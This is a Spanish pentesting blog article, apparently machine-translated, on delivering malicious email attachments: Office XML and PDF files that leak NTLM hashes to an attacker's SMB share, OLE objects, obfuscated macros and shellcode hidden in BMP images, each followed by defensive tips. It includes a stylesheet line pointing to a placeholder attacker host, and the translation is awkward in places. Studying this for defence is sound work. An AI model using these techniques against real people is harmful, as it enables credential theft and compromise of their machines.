Abierto no puede ser ignorado

Mi trabajo está relacionado con el hecho de que le miento a la gente y exploto su credulidad, curiosidad, codicia, etc. Amo mi trabajo e intento abordarlo de manera creativa. Los detalles de mi actividad están relacionados con la realización de ataques por el método de ingeniería social. Y en esta publicación me gustaría hablar sobre archivos adjuntos maliciosos.

Si el PDF cae en su correo, ¿lo abrirá? ¿Y el archivo de Word? ¿Abrirás la imagen de una fuente desconocida? ¿Es posible tener problemas si descarga el archivo? ¿Qué tan bien sabe qué inversiones son peligrosas y cuáles no? ¿Qué hay de tus colegas?

Para varias docenas de proyectos, he intentado formas completamente diferentes de entregar la carga útil al usuario. Algunos fueron muy efectivos, otros se detectaron fácilmente: cada uno tiene sus propios inconvenientes y ventajas. No comenzaré a decir cómo empaquetar archivos ejecutables con la extensión .exe en el archivo. Con un enfoque tan anticuado, romper los sistemas de seguridad y luego hacer que el usuario inicie el archivo adjunto es más costoso. Te diré qué archivos potencialmente peligrosos realmente se pueden recibir por correo (o enviado) hoy.

Descargo de responsabilidad: Todo lo siguiente es solo para fines informativos. El autor describe la experiencia adquirida durante los pentests, no es responsable de la repetición de estos ataques y alienta a no utilizar el material con fines ilegales.

XML

La esencia del método.

La mayoría de los archivos de Office se basan en Microsoft Office Open XML (OOXML), que es esencialmente un formato XML comprimido desarrollado por Microsoft para presentar tablas, diagramas, presentaciones, etc. La participación de XML se muestra en la extensión del documento (docx, xlsx, pptx). Es muy curioso que dichos documentos de Office se puedan abrir como un archivo de texto normal con todas las etiquetas y atributos. Cualquier archivo XML abierto de Office se puede guardar como XML y realizar cambios en las etiquetas. Por ejemplo, agregue un enlace a una carpeta pública controlada por un atacante. Cuando ejecuta el archivo XML, intenta conectarse a una carpeta pública abierta. Al intentar conectarse a través del protocolo smb, Windows amablemente proporciona un hash NTLM (NTLMv2) e inicio de sesión de usuario a un atacante.



Implementación en pocas palabras

Para implementar el vector, debe crear un documento Office Open XML (docx, pptx, xlsx, etc.), guardarlo como XML. Abra XML y realice los siguientes cambios:

<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">

En la etiqueta especificada, debe especificar la dirección de la carpeta de red pública a la que se conectará la víctima.

Nota : en lugar de ="\\xxx.xxx.xxx.xxx\test\swordfish.xsl puede escribir el file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl . A continuación, el archivo debe guardarse y enviarse a la víctima.

La información sobre el ataque se puede encontrar aquí .

Nota : dependiendo del sistema operativo y la configuración, el usuario puede tener que aceptar condiciones o comentarios adicionales, por ejemplo:



Un artículo estaría incompleto sin consejos de protección:

• Use una política de contraseña compleja.
• Use NTLMv2.
• Denegar el tráfico externo a través de smb (tcp 139/445).

PDF incorrecto

La esencia del método.

Se agrega una etiqueta al archivo PDF con un enlace a un servidor smb público controlado por el atacante. Como en el ejemplo anterior, al abrir un archivo, el sistema operativo transmite un hash NTLM (NTLMv2) para conectarse a la carpeta pública.

Implementación en pocas palabras

Implementar este ataque es mucho más fácil que el anterior. Para robar con éxito un hash, simplemente descargue la utilidad (git clone aquí o aquí ) y otorgue el derecho de ejecutar (chmod + x) el archivo python. A continuación, ejecute el script de Python e ingrese la dirección IP, el nombre del archivo y la interfaz, como se muestra en la figura a continuación.


Generando un archivo de carga útil.

El archivo recibido se puede enviar al correo con el pretexto de una felicitación, un documento para la firma, un escaneo de la aplicación, etc. Cuando se inicia el archivo, todos los hash se enviarán al atacante.



Protección

• Use una política de contraseña compleja.
• Use NTLMv2.
• Denegar el tráfico externo a través de smb (tcp 139/445).

Objeto OLE

La esencia del método.

En un documento legítimo de Office, se incrusta un script que se inicia haciendo clic. El script puede ser absolutamente cualquiera, generalmente es solo una carga útil. Tiene su propio icono, que se puede cambiar, según los deseos del atacante, hasta una copia completa del estilo de los documentos de Office que simulan mensajes de error. A diferencia de las macros, un archivo con un archivo adjunto OLE no es sospechoso para los usuarios comunes.


Implementación en pocas palabras

Para prepararse para este ataque tendrá que gastar un poco más de esfuerzo (en comparación con los anteriores). El primer paso es generar una carga útil. A continuación, debe iniciar el servidor, que recibirá conexiones de la carga útil, luego creará un documento de Word, lo convertirá a RTF y agregará un enlace a la carga útil. Si brevemente.
La información sobre el ataque se puede encontrar aquí .

Protección

Para protegerse contra tales ataques, le recomendamos que realice los siguientes cambios en el registro:

HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPrompt

El valor de la Office Version puede ser 16.0 (Office 2016); 15.0 (Oficina 2013); 14.0 (Office 2010); o 12.0 (Office 2007). El valor de la Office application de Office application es el nombre de una aplicación de Office específica, es decir, Word, Excel, etc.

El valor de esta clave de registro debe ser "2", lo que significará "Sin solicitud, el objeto no se ejecuta" o una prohibición real de la ejecución de objetos. Un valor de "1" permite al usuario "Preguntar desde Office cuando el usuario hace clic, el objeto se ejecuta", es decir, se hace clic en los objetos y Office muestra el mensaje correspondiente. El valor "0", a su vez, significa "Ningún mensaje de Office cuando el usuario hace clic, el objeto se ejecuta", en otras palabras, los objetos se ejecutan, pero el usuario no recibe ningún mensaje de Office.

Se pueden realizar cambios si estas funciones no se utilizan en los procesos comerciales de su empresa.

Macros

Desde que se mencionó OLE, ¿cómo no puedo mencionar macros?



La esencia del método.

Macro: un conjunto de comandos diseñado para simplificar el trabajo del usuario. Potencialmente, puede escribir absolutamente cualquier conjunto de comandos en una macro y así obtener una carga útil. Para crear un documento con una macro, un atacante solo necesita ofuscar el código de carga útil y agregar el código a la macro del documento.

Implementación en pocas palabras

Hay muchas maneras de generar una macro en este momento. Puedes usar la herramienta Luckystrike o detenerte en el Metasploit más familiar. Puede usar msfvenom y ofuscar la macro después de la generación. Cuando se crea la macro, todo lo que necesita hacer es agregarla al documento de Office. Pero a diferencia de un archivo adjunto OLE, realmente necesita mucho esfuerzo para ejecutar una macro. Por el momento, muy pocos usuarios ejecutarán macros. Windows ya aprendió a advertir sobre macros sospechosas, y se ha hablado mucho sobre su peligro.

Protección

Para mayor confiabilidad, recomiendo deshabilitar la ejecución de macros sin notificación.

BMP

Es muy poco probable que alguna vez encuentre un archivo adjunto BMP con un código de shell, así que tenga en cuenta: existen.

La esencia del método.

El código de shell está incrustado en la imagen en formato BMP. La imagen en sí no es peligrosa en el momento del descubrimiento. No se trata de dejar que un atacante tome una sesión. La imagen es necesaria para mentir y esperar la hora en que el atacante la activa con el comando Powershell. Este método no es tanto un ataque como un bypass de antivirus y herramientas de detección de intrusos.

Implementación en pocas palabras

Para crear una imagen, solo use este repositorio . DKMC proporciona todo, desde la generación de imágenes hasta la ofuscación de código. También quiero señalar que la imagen "infectada" contendrá extraños píxeles multicolores. Esto se puede solucionar fácilmente si recorta el área visible de la imagen en 5-10 píxeles.

Después de crear la imagen, el archivo debe entregarse a la víctima y esperar la ocasión correcta o buscar la oportunidad de ejecutar el script de PowerShell.

Protección

Filtrar cada archivo bmp como potencialmente peligroso es ineficiente. Puede usar convertidores y guardar imágenes en otros formatos, inspeccionar archivos en computadoras o aceptar el hecho de que si un atacante logró usar el script de PowerShell en la computadora de un empleado, la presencia de una imagen con código Shell no es el principal problema de seguridad.

Eso, de hecho, es todo. Espero que este artículo haya ampliado su comprensión de las inversiones y los peligros que pueden acarrear. Hablaremos de enlaces sospechosos un poco más tarde.



Ekaterina Rudaya ( Caterin ), experta en el Laboratorio de Análisis Práctico de Seguridad, Jet Infosystems